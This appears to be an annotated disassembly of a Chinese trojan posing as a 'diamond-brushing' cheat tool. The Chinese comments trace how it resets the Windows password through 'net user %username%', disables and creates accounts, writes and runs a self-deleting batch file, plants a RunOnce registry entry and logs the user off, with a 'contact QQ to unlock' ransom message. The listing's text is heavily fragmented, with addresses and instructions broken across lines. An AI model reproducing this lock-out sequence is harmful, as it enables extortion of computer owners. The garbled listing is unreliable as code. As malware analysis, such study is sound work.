004010
CB
55
push ebp
004010
CC
8
BEC mov ebp
,
esp
004010
CE
81
EC
0
C
000000
sub esp
,
0
C
004010
D
4
68
3
C
000000
push
3
C
004010
D
9
E
8
6
F
050000
call 刷钻.
0040164
D
004010
DE
83
C
4
04
add
esp
,
4
004010
E
1
8945
FC mov dword ptr ss
:
[ebp
-4
]
,
eax
004010
E
4
8
BD
8
mov ebx
,
eax
004010
E
6
8
BF
8
mov edi
,
eax
004010
E
8
33
C
0
xor eax
,
eax
004010
EA B
9
0
F
000000
mov ecx
,
0
F
004010
EF F
3
:
AB rep stos dword ptr es
:
[edi]
004010
F
1
83
C
3
08
add
ebx
,
8
004010
F
4
B
8
00000000
mov eax
,
0
004010
F
9
8903
mov dword ptr ds
:
[ebx]
,
eax
004010
FB
83
C
3
14
add
ebx
,
14
004010
FE B
8
00000000
mov eax
,
0
00401103
8903
mov dword ptr ds
:
[ebx]
,
eax
00401105
83
C
3
08
add
ebx
,
8
00401108
B
8
00000000
mov eax
,
0
0040110
D
8903
mov dword ptr ds
:
[ebx]
,
eax
0040110
F
68
04000200
push
20004
00401114
6
A
00
push
0
00401116
FF
75
FC push dword ptr ss
:
[ebp
-4
]
00401119
68
01000000
push
1
0040111
E B
8
01000000
mov eax
,
1
;忽略,以上主要是:保护现场,开辟初始化局部空间,变量初始化操作等
00401123
BB B
0384400
mov ebx
,
刷钻.
004438
B
0
00401128
E
8
1
A
050000
call 刷钻.
00401647
; 获取用户名 系统目录等
0040112
D
83
C
4
10
add
esp
,
10
00401130
B
8
50
E
74600
mov eax
,
刷钻.
0046
E
750
; 用户名:联系QQ
78111975
解锁
00401135
50
push eax
00401136
8
B
1
D
18
DF
4800
mov ebx
,
dword ptr ds
:
[
48
DF
18
]
0040113
C
85
DB test ebx
,
ebx
0040113
E
74
09
je short 刷钻.
00401149
00401140
53
push ebx
00401141
E
8
F
5040000
call 刷钻.
0040163
B
00401146
83
C
4
04
add
esp
,
4
00401149
58
pop eax
0040114
A A
3
18
DF
4800
mov dword ptr ds
:
[
48
DF
18
]
,
eax
0040114
F B
8
63
E
74600
mov eax
,
刷钻.
0046
E
763
; 密码:admintiejiu
520
00401154
50
push eax
00401155
8
B
1
D
1
CDF
4800
mov ebx
,
dword ptr ds
:
[
48
DF
1
C]
0040115
B
85
DB test ebx
,
ebx
0040115
D
74
09
je short 刷钻.
00401168
0040115
F
53
push ebx
00401160
E
8
D
6040000
call 刷钻.
0040163
B
00401165
83
C
4
04
add
esp
,
4
00401168
58
pop eax
00401169
A
3
1
CDF
4800
mov dword ptr ds
:
[
48
DF
1
C]
,
eax
0040116
E FF
35
1
CDF
4800
push dword ptr ds
:
[
48
DF
1
C]
00401174
68
72
E
74600
push 刷钻.
0046
E
772
; net user %username%
00401179
B
9
02000000
mov ecx
,
2
0040117
E E
8
ECFEFFFF call 刷钻.
0040106
F ; net命令连接密码
00401183
83
C
4
08
add
esp
,
8
00401186
8945
F
8
mov dword ptr ss
:
[ebp
-8
]
,
eax
00401189
68
01030080
push
80000301
0040118
E
6
A
00
push
0
00401190
68
01000000
push
1
00401195
68
02000080
push
80000002
0040119
A
6
A
00
push
0
0040119
C
68
00000000
push
0
004011
A
1
68
04000080
push
80000004
004011
A
6
6
A
00
push
0
004011
A
8
8
B
45
F
8
mov eax
,
dword ptr ss
:
[ebp
-8
]
004011
AB
85
C
0
test eax
,
eax
004011
AD
75
05
jnz short 刷钻.
004011
B
4
004011
AF B
8
87
E
74600
mov eax
,
刷钻.
0046
E
787
004011
B
4
50
push eax
004011
B
5
68
03000000
push
3
004011
BA BB
90174000
mov ebx
,
刷钻.
00401790
004011
BF E
8
7
D
040000
call 刷钻.
00401641
; 修改开机密码
004011
C
4
83
C
4
28
add
esp
,
28
004011
C
7
8
B
5
D F
8
mov ebx
,
dword ptr ss
:
[ebp
-8
]
004011
CA
85
DB test ebx
,
ebx
004011
CC
74
09
je short 刷钻.
004011
D
7
004011
CE
53
push ebx
004011
CF E
8
67040000
call 刷钻.
0040163
B
004011
D
4
83
C
4
04
add
esp
,
4
004011
D
7
68
1
CDF
4800
push 刷钻.
0048
DF
1
C
004011
DC E
8
24020000
call 刷钻.
00401405
; 禁用账户
004011
E
1
68
1
CDF
4800
push 刷钻.
0048
DF
1
C
004011
E
6
68
18
DF
4800
push 刷钻.
0048
DF
18
004011
EB E
8
E
5020000
call 刷钻.
004014
D
5
; 创建用户
004011
F
0
68
88
E
74600
push 刷钻.
0046
E
788
;
/
del\r\ndel C
:
\Program Files\\
1.
bat
004011
F
5
FF
35
18
DF
4800
push dword ptr ds
:
[
48
DF
18
]
004011
FB
68
ABE
74600
push 刷钻.
0046
E
7
AB ; net user
00401200
B
9
03000000
mov ecx
,
3
00401205
E
8
65
FEFFFF call 刷钻.
0040106
F
0040120
A
83
C
4
0
C
add
esp
,
0
C
0040120
D
8945
F
8
mov dword ptr ss
:
[ebp
-8
]
,
eax
00401210
68
04000080
push
80000004
00401215
6
A
00
push
0
00401217
8
B
45
F
8
mov eax
,
dword ptr ss
:
[ebp
-8
]
0040121
A
85
C
0
test eax
,
eax
0040121
C
75
05
jnz short 刷钻.
00401223
0040121
E B
8
87
E
74600
mov eax
,
刷钻.
0046
E
787
00401223
50
push eax
00401224
68
01000000
push
1
00401229
BB
10194000
mov ebx
,
刷钻.
00401910
0040122
E E
8
0
E
040000
call 刷钻.
00401641
00401233
83
C
4
10
add
esp
,
10
00401236
8945
F
4
mov dword ptr ss
:
[ebp
-
C]
,
eax
00401239
8
B
5
D F
8
mov ebx
,
dword ptr ss
:
[ebp
-8
]
0040123
C
85
DB test ebx
,
ebx
0040123
E
74
09
je short 刷钻.
00401249
00401240
53
push ebx
00401241
E
8
F
5030000
call 刷钻.
0040163
B
00401246
83
C
4
04
add
esp
,
4
00401249
68
05000080
push
80000005
0040124
E
6
A
00
push
0
00401250
8
B
45
F
4
mov eax
,
dword ptr ss
:
[ebp
-
C]
00401253
85
C
0
test eax
,
eax
00401255
75
05
jnz short 刷钻.
0040125
C
00401257
B
8
B
5
E
74600
mov eax
,
刷钻.
0046
E
7
B
5
0040125
C
50
push eax
0040125
D
68
04000080
push
80000004
00401262
6
A
00
push
0
00401264
68
BDE
74600
push 刷钻.
0046
E
7
BD ; C
:
\Program Files\
1.
bat
00401269
68
02000000
push
2
0040126
E BB C
0194000
mov ebx
,
刷钻.
004019
C
0
00401273
E
8
C
9030000
call 刷钻.
00401641
; 创建并运行
1.
bat
00401278
83
C
4
1
C
add
esp
,
1
C
0040127
B
8
B
5
D F
4
mov ebx
,
dword ptr ss
:
[ebp
-
C]
0040127
E
85
DB test ebx
,
ebx
00401280
74
09
je short 刷钻.
0040128
B
00401282
53
push ebx
00401283
E
8
B
3030000
call 刷钻.
0040163
B
00401288
83
C
4
04
add
esp
,
4
0040128
B
68
04000080
push
80000004
00401290
6
A
00
push
0
00401292
68
BDE
74600
push 刷钻.
0046
E
7
BD ; C
:
\Program Files\
1.
bat
00401297
68
04000080
push
80000004
0040129
C
6
A
00
push
0
0040129
E
68
D
4
E
74600
push 刷钻.
0046
E
7
D
4
;SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\MicrosoftWindows
004012
A
3
68
01030080
push
80000301
004012
A
8
6
A
00
push
0
004012
AA
68
04000000
push
4
004012
AF
68
03000000
push
3
004012
B
4
BB A
01
D
4000
mov ebx
,
刷钻.
00401
DA
0
004012
B
9
E
8
83030000
call 刷钻.
00401641
; 注册表操作
004012
BE
83
C
4
28
add
esp
,
28
004012
C
1
E
8
95020000
call 刷钻.
0040155
B
004012
C
6
68
01030080
push
80000301
004012
CB
6
A
00
push
0
004012
CD
68
01000000
push
1
004012
D
2
68
02000080
push
80000002
004012
D
7
6
A
00
push
0
004012
D
9
68
00000000
push
0
004012
DE
68
04000080
push
80000004
004012
E
3
6
A
00
push
0
004012
E
5
68
17
E
84600
push 刷钻.
0046
E
817
; shutdown
-
l
004012
EA
68
03000000
push
3
004012
EF BB
90174000
mov ebx
,
刷钻.
00401790
004012
F
4
E
8
48030000
call 刷钻.
00401641
; 注销机器